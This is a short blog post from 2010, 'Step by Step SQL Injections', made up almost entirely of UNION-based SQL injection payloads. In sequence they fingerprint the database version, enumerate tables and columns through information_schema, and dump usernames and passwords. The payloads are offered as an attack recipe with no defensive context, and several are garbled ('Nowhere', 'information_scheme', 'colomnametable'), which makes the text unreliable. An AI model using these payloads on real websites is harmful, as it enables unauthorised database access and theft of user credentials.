0 comments

Step by Step SQL Injections

Published on Monday, August 2, 2010 in

Ok... website alerts token error ...
1.
+ Union + all + select +1, version () ,3,4,5,6,7 -
2.
+ Union + all + select +1, group_concat (table_name), 3,4,5,6,7 + from + information_schema.tables + Nowhere + table_schema = database () -
next ..



continue ....
3.
http://www.piclist.com/techref/ascii.htm
4.
+ Union + all + select +1, group_concat (column_name), 3,4,5,6,7 + from + information_scheme.columns + No where + table_name = 0xasciiname table -
5.
+ Union + all + select +1, group_concat (username, 0x3a, pass), 3,4,5,6,7 + from + colomnametable -

nice t0 or basic reason:)

Spread The Love, Share Our Article

Related Posts

No Response to "Step by Step SQL Injections"

Add Your Comment